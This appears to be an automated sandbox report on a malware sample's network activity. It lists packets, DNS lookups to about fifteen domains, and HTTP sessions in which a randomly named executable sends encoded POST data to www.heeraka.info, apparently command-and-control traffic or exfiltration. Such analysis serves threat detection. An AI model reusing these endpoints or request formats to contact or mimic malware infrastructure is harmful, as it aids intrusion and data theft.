Oct 11, 2024 10:06:19.522388935 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.522917032 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.523026943 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.523159981 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.523170948 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.523720980 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543267012 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543354034 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543476105 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543548107 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.543579102 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543591022 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.543740034 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:20.862349987 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:21.879791021 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.040184021 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.040379047 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.047156096 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.207654953 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.217694044 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.217802048 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.217817068 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.217828035 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.217905045 CEST	80	49911	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:22.218101978 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.218127012 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.221165895 CEST	49911	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:22.381618023 CEST	80	49911	63.250.47.57	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 10:00:34.949820995 CEST	62021	53	192.168.11.20	1.1.1.1
Oct 11, 2024 10:00:35.061445951 CEST	53	62021	1.1.1.1	192.168.11.20
Oct 11, 2024 10:00:55.327033043 CEST	64520	53	192.168.11.20	1.1.1.1
Oct 11, 2024 10:00:55.561216116 CEST	53	64520	1.1.1.1	192.168.11.20
Oct 11, 2024 10:01:08.699074030 CEST	62060	53	192.168.11.20	1.1.1.1
Oct 11, 2024 10:01:09.000457048 CEST	53	62060	1.1.1.1	192.168.11.20
Oct 11, 2024 10:01:22.602083921 CEST	62444	53	192.168.11.20	1.1.1.1
Oct 11, 2024 10:01:23.035373926 CEST	53	62444	1.1.1.1	192.168.11.20
Oct 11, 2024 10:01:36.661467075 CEST	53344	53	192.168.11.20	1.1.1.1
Oct 11, 2024 10:01:37.674675941 CEST	53344	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:01:38.434571981 CEST	53	53344	9.9.9.9	192.168.11.20
Oct 11, 2024 10:01:39.635823965 CEST	53	53344	1.1.1.1	192.168.11.20
Oct 11, 2024 10:01:51.923921108 CEST	51535	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:01:52.372145891 CEST	53	51535	9.9.9.9	192.168.11.20
Oct 11, 2024 10:02:05.842546940 CEST	57585	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:02:05.943497896 CEST	53	57585	9.9.9.9	192.168.11.20
Oct 11, 2024 10:02:19.995779037 CEST	59203	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:02:20.103790998 CEST	53	59203	9.9.9.9	192.168.11.20
Oct 11, 2024 10:02:34.196074963 CEST	57597	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:02:34.297228098 CEST	53	57597	9.9.9.9	192.168.11.20
Oct 11, 2024 10:02:47.739648104 CEST	49477	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:02:47.842756987 CEST	53	49477	9.9.9.9	192.168.11.20
Oct 11, 2024 10:03:01.362019062 CEST	56603	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:03:01.505188942 CEST	53	56603	9.9.9.9	192.168.11.20
Oct 11, 2024 10:03:15.155561924 CEST	61999	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:03:15.257913113 CEST	53	61999	9.9.9.9	192.168.11.20
Oct 11, 2024 10:03:28.402654886 CEST	58170	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:03:28.504823923 CEST	53	58170	9.9.9.9	192.168.11.20
Oct 11, 2024 10:03:42.540107012 CEST	49954	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:03:42.641216040 CEST	53	49954	9.9.9.9	192.168.11.20
Oct 11, 2024 10:03:56.693196058 CEST	60649	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:03:56.794606924 CEST	53	60649	9.9.9.9	192.168.11.20
Oct 11, 2024 10:04:16.876265049 CEST	59758	53	192.168.11.20	9.9.9.9
Oct 11, 2024 10:04:16.979387999 CEST	53	59758	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2024 10:00:34.949820995 CEST	192.168.11.20	1.1.1.1	0x8538	Standard query (0)	www.academyinmotion.xyz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:00:55.327033043 CEST	192.168.11.20	1.1.1.1	0x1e82	Standard query (0)	www.heeraka.info	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:08.699074030 CEST	192.168.11.20	1.1.1.1	0x7758	Standard query (0)	www.awesomearv.buzz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:22.602083921 CEST	192.168.11.20	1.1.1.1	0xda47	Standard query (0)	www.030002252.xyz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:36.661467075 CEST	192.168.11.20	1.1.1.1	0x42f5	Standard query (0)	www.60881.xyz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:37.674675941 CEST	192.168.11.20	9.9.9.9	0x42f5	Standard query (0)	www.60881.xyz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:51.923921108 CEST	192.168.11.20	9.9.9.9	0x203e	Standard query (0)	www.mjcregionsud.org	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:05.842546940 CEST	192.168.11.20	9.9.9.9	0x3cce	Standard query (0)	www.levelsabovetravel.info	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:19.995779037 CEST	192.168.11.20	9.9.9.9	0x196f	Standard query (0)	www.d81dp.top	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:34.196074963 CEST	192.168.11.20	9.9.9.9	0xace0	Standard query (0)	www.numbox.live	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:47.739648104 CEST	192.168.11.20	9.9.9.9	0x598b	Standard query (0)	www.ly0.xyz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:01.362019062 CEST	192.168.11.20	9.9.9.9	0x70bc	Standard query (0)	www.myrideguy.net	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:15.155561924 CEST	192.168.11.20	9.9.9.9	0xba1a	Standard query (0)	www.lunch.delivery	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:28.402654886 CEST	192.168.11.20	9.9.9.9	0xedbe	Standard query (0)	www.allinathletes.biz	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:42.540107012 CEST	192.168.11.20	9.9.9.9	0x6194	Standard query (0)	www.barbequecritics.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:56.693196058 CEST	192.168.11.20	9.9.9.9	0x6e5a	Standard query (0)	www.wineservicesgroup.net	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:04:16.876265049 CEST	192.168.11.20	9.9.9.9	0xd8b6	Standard query (0)	www.1clickw2.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2024 10:00:35.061445951 CEST	1.1.1.1	192.168.11.20	0x8538	No error (0)	www.academyinmotion.xyz	academyinmotion.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:00:35.061445951 CEST	1.1.1.1	192.168.11.20	0x8538	No error (0)	academyinmotion.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:00:35.061445951 CEST	1.1.1.1	192.168.11.20	0x8538	No error (0)	academyinmotion.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:00:55.561216116 CEST	1.1.1.1	192.168.11.20	0x1e82	No error (0)	www.heeraka.info		75.2.103.23	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:09.000457048 CEST	1.1.1.1	192.168.11.20	0x7758	No error (0)	www.awesomearv.buzz		161.97.168.245	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:23.035373926 CEST	1.1.1.1	192.168.11.20	0xda47	No error (0)	www.030002252.xyz	030002252.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:01:23.035373926 CEST	1.1.1.1	192.168.11.20	0xda47	No error (0)	030002252.xyz		65.21.196.90	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:38.434571981 CEST	9.9.9.9	192.168.11.20	0x42f5	No error (0)	www.60881.xyz	huayang.302.gn301.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:01:38.434571981 CEST	9.9.9.9	192.168.11.20	0x42f5	No error (0)	huayang.302.gn301.xyz		172.247.44.157	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:38.434571981 CEST	9.9.9.9	192.168.11.20	0x42f5	No error (0)	huayang.302.gn301.xyz		107.148.177.200	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:39.635823965 CEST	1.1.1.1	192.168.11.20	0x42f5	No error (0)	www.60881.xyz	huayang.302.gn301.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:01:39.635823965 CEST	1.1.1.1	192.168.11.20	0x42f5	No error (0)	huayang.302.gn301.xyz		107.148.177.200	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:39.635823965 CEST	1.1.1.1	192.168.11.20	0x42f5	No error (0)	huayang.302.gn301.xyz		172.247.44.157	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:01:52.372145891 CEST	9.9.9.9	192.168.11.20	0x203e	No error (0)	www.mjcregionsud.org	mjcregionsud.org		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:01:52.372145891 CEST	9.9.9.9	192.168.11.20	0x203e	No error (0)	mjcregionsud.org		91.212.26.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:05.943497896 CEST	9.9.9.9	192.168.11.20	0x3cce	No error (0)	www.levelsabovetravel.info	levelsabovetravel.info		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:02:05.943497896 CEST	9.9.9.9	192.168.11.20	0x3cce	No error (0)	levelsabovetravel.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:05.943497896 CEST	9.9.9.9	192.168.11.20	0x3cce	No error (0)	levelsabovetravel.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:20.103790998 CEST	9.9.9.9	192.168.11.20	0x196f	No error (0)	www.d81dp.top	d81dp.top		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:02:20.103790998 CEST	9.9.9.9	192.168.11.20	0x196f	No error (0)	d81dp.top		154.23.184.194	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:34.297228098 CEST	9.9.9.9	192.168.11.20	0xace0	No error (0)	www.numbox.live		63.250.47.57	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:47.842756987 CEST	9.9.9.9	192.168.11.20	0x598b	No error (0)	www.ly0.xyz		172.67.220.57	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:02:47.842756987 CEST	9.9.9.9	192.168.11.20	0x598b	No error (0)	www.ly0.xyz		104.21.78.104	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:01.505188942 CEST	9.9.9.9	192.168.11.20	0x70bc	No error (0)	www.myrideguy.net	myrideguy.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:03:01.505188942 CEST	9.9.9.9	192.168.11.20	0x70bc	No error (0)	myrideguy.net		68.66.226.116	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:15.257913113 CEST	9.9.9.9	192.168.11.20	0xba1a	No error (0)	www.lunch.delivery		76.223.54.146	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:15.257913113 CEST	9.9.9.9	192.168.11.20	0xba1a	No error (0)	www.lunch.delivery		13.248.169.48	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:28.504823923 CEST	9.9.9.9	192.168.11.20	0xedbe	No error (0)	www.allinathletes.biz	allinathletes.biz		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:03:28.504823923 CEST	9.9.9.9	192.168.11.20	0xedbe	No error (0)	allinathletes.biz		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:28.504823923 CEST	9.9.9.9	192.168.11.20	0xedbe	No error (0)	allinathletes.biz		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:42.641216040 CEST	9.9.9.9	192.168.11.20	0x6194	No error (0)	www.barbequecritics.com	barbequecritics.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:03:42.641216040 CEST	9.9.9.9	192.168.11.20	0x6194	No error (0)	barbequecritics.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:42.641216040 CEST	9.9.9.9	192.168.11.20	0x6194	No error (0)	barbequecritics.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:56.794606924 CEST	9.9.9.9	192.168.11.20	0x6e5a	No error (0)	www.wineservicesgroup.net	wineservicesgroup.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:03:56.794606924 CEST	9.9.9.9	192.168.11.20	0x6e5a	No error (0)	wineservicesgroup.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:03:56.794606924 CEST	9.9.9.9	192.168.11.20	0x6e5a	No error (0)	wineservicesgroup.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:04:16.979387999 CEST	9.9.9.9	192.168.11.20	0xd8b6	No error (0)	www.1clickw2.net	1clickw2.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2024 10:04:16.979387999 CEST	9.9.9.9	192.168.11.20	0xd8b6	No error (0)	1clickw2.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:04:16.979387999 CEST	9.9.9.9	192.168.11.20	0xd8b6	No error (0)	1clickw2.net		3.33.130.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.academyinmotion.xyz

www.heeraka.info

www.awesomearv.buzz

www.030002252.xyz

www.mjcregionsud.org

www.levelsabovetravel.info

www.d81dp.top

www.numbox.live

www.ly0.xyz

www.myrideguy.net

www.lunch.delivery

www.allinathletes.biz

www.barbequecritics.com

www.wineservicesgroup.net

www.1clickw2.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49818	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:00:35.174676895 CEST	547	OUT	GET /63ck/?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s= HTTP/1.1 Host: www.academyinmotion.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:00:35.277471066 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:00:35 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 26 41 54 6b 3d 47 51 59 72 61 4f 67 35 30 46 7a 48 76 57 78 54 79 38 30 74 67 37 71 56 76 53 56 73 62 4b 55 6c 31 70 73 7a 59 4f 36 42 71 75 77 59 38 7a 43 52 66 50 75 4f 50 50 58 76 36 6f 70 77 57 51 2b 31 71 61 30 59 56 4a 4e 31 5a 6c 5a 64 34 41 4c 36 70 6a 56 63 77 4a 62 67 30 63 33 42 69 63 6c 2b 55 2f 35 34 61 7a 4c 71 48 2b 37 4d 73 33 51 42 32 42 69 51 76 30 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49819	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:00:55.670958996 CEST	795	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2b 50 67 73 4e 37 68 68 45 76 30 50 52 6f 45 34 2b 45 41 4f 71 78 32 65 4a 46 62 6c 79 51 6a 32 55 77 3d 3d Data Ascii: ATk=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r+PgsN7hhEv0PRoE4+EAOqx2eJFblyQj2Uw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49820	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:00:58.308675051 CEST	815	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 58 74 68 50 44 34 59 77 4f 64 2b 79 64 33 70 35 59 4b 30 56 65 5a 31 71 6f 64 6f 6c 4f 75 57 49 74 72 6d 42 67 48 42 4f 4c 72 4f 6f 7a 68 6e 32 31 45 68 74 75 78 54 45 37 50 44 6e 6f 61 55 31 39 75 79 45 42 6b 4d 7a 50 52 36 6a 43 4c 30 62 7a 52 4a 32 4d 7a 73 73 53 54 6e 59 31 5a 6c 4e 76 37 58 63 75 4f 7a 6f 2f 4d 30 54 43 2f 34 2f 2b 6a 64 35 4c 30 78 75 56 61 64 59 56 75 4f 61 6b 6d 5a 65 56 69 6a 32 30 71 70 69 71 73 4e 31 69 4e 77 53 69 74 4a 7a 66 42 4b 2b 34 57 4d 4f 4f 32 70 55 57 33 6f 78 53 69 42 59 77 3d Data Ascii: ATk=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnXthPD4YwOd+yd3p5YK0VeZ1qodolOuWItrmBgHBOLrOozhn21EhtuxTE7PDnoaU19uyEBkMzPR6jCL0bzRJ2MzssSTnY1ZlNv7XcuOzo/M0TC/4/+jd5L0xuVadYVuOakmZeVij20qpiqsN1iNwSitJzfBK+4WMOO2pUW3oxSiBYw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49821	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:00.949393988 CEST	2578	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 66 74 68 35 58 34 59 52 4f 64 39 79 64 33 71 35 59 4a 30 56 65 55 31 71 67 5a 6f 6c 79 59 57 4b 56 72 6d 6a 59 48 44 38 6a 72 46 6f 7a 68 6c 32 31 4a 6c 74 75 6b 54 41 66 44 44 6b 41 61 55 31 39 75 79 47 5a 6b 46 43 50 52 38 6a 43 49 69 72 7a 4e 4e 32 4e 55 73 73 62 6f 6e 59 78 76 6c 65 6e 37 55 2f 57 4f 78 61 58 4d 6f 44 43 39 35 2f 2b 42 64 35 48 52 78 75 34 6c 64 5a 77 6d 4f 64 34 6d 5a 59 34 68 33 79 38 68 7a 41 37 37 48 57 32 74 32 51 75 59 4c 55 58 45 42 73 34 34 47 37 76 69 70 58 48 34 38 42 53 59 62 76 78 56 50 4e 6f 38 56 6d 75 75 43 45 6f 6f 63 78 5a 54 2f 6d 61 47 32 4b 47 37 73 61 70 2b 74 2f 67 65 39 4b 49 6a 37 42 65 74 71 73 6d 32 39 74 48 48 53 37 66 31 4b 6d 63 42 5a 30 64 48 42 44 43 64 33 47 75 6c 52 42 71 32 30 63 68 4f 4b 73 6c 41 6f 51 62 32 5a 4a 7a 49 58 47 46 38 79 46 55 45 38 33 63 73 77 5a 33 63 75 4b 61 4d 45 49 62 58 73 46 41 45 79 65 [TRUNCATED] Data Ascii: ATk=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnfth5X4YROd9yd3q5YJ0VeU1qgZolyYWKVrmjYHD8jrFozhl21JltukTAfDDkAaU19uyGZkFCPR8jCIirzNN2NUssbonYxvlen7U/WOxaXMoDC95/+Bd5HRxu4ldZwmOd4mZY4h3y8hzA77HW2t2QuYLUXEBs44G7vipXH48BSYbvxVPNo8VmuuCEoocxZT/maG2KG7sap+t/ge9KIj7Betqsm29tHHS7f1KmcBZ0dHBDCd3GulRBq20chOKslAoQb2ZJzIXGF8yFUE83cswZ3cuKaMEIbXsFAEyeu+ZgOwA6DjZWSVVk36hCwk99beTxhcXX2KI7SI6IZHas24sIsgxBinF99iqwXROpih3Ps8c8JMnDXpJce9kwRxjeSR2J0mVl5/IVyOwEDjd6osTCm70gjktp6PUAI4cUIfEjSBCOCogWPgF6RHqhDF5fOX3rTN4fJCwDnSSB/GXrg/xtnvmoffZwK5BwA0vgpd5dvAGk08SWqHnE+BdghFo19xGpgOHvtoxTJvKCpI6FelQh3uNAtrI1J9GbLMuxbhEM9suCnSDDUVziaDc+3Z7zdxiK6+sh4gy8rZ1MQn+bAT0KVKJglAEBqVhmNVT+3UAtFgQ5pzasXuNCBCF6zFuCmyQixq29Q/w4/DtE1mwl8C4FESOYqepgd7CuSQooJx85jRctApVyOCFJMKtRi8SyafdV+YN4Gt1YbkoXxAo+5ILM2XMmJS50dEEEUonFeNeaOlbkrtfnnV1Hsa7X44lReogyYQOpQwQRtCTy7jk3fQsmo6/1NIx3yvGeQo4LDyukyscO5GyN8g/GM8H5itKYptmOF6bYs4Pi7M5bZq/Qf5V6st309yfC0v8Czos9Vv1dtz4Gg8yzRhZGzdnTqaDvQL0v+aqmH08E0vZWvIgFXO82z/+cLcL90jYED8ug0Qu7niSf2AGxy6pZ7FdCQ7hjNpkXjXIDCP [TRUNCATED]
Oct 11, 2024 10:01:00.949491978 CEST	5386	OUT	Data Raw: 47 7a 75 4f 65 31 4b 44 6b 70 69 2b 6d 7a 48 75 68 63 49 43 70 43 39 61 56 36 4d 41 70 55 65 47 61 43 79 63 62 6a 48 75 2b 37 78 66 68 78 67 36 30 46 45 6e 75 43 77 63 2b 4f 49 4d 59 7a 72 6e 6e 4f 2b 2f 71 33 42 35 43 4a 57 66 61 78 6e 4e 32 43 Data Ascii: GzuOe1KDkpi+mzHuhcICpC9aV6MApUeGaCycbjHu+7xfhxg60FEnuCwc+OIMYzrnnO+/q3B5CJWfaxnN2CsfphfnMGk3CnLYeznpetjSMz094NEwj+pyG4xkK7LIoouLDPWvQjs9HUjDUOqd7JNksD/UtWm5qp/yM0xhYZ/MaqefJahcgnEd9pIfgCw4+DicRDMGXkd7RpEixVTYYHGa6SDkmzfSPZTtBp7wpoqc0IcZBt7HDpp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49822	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
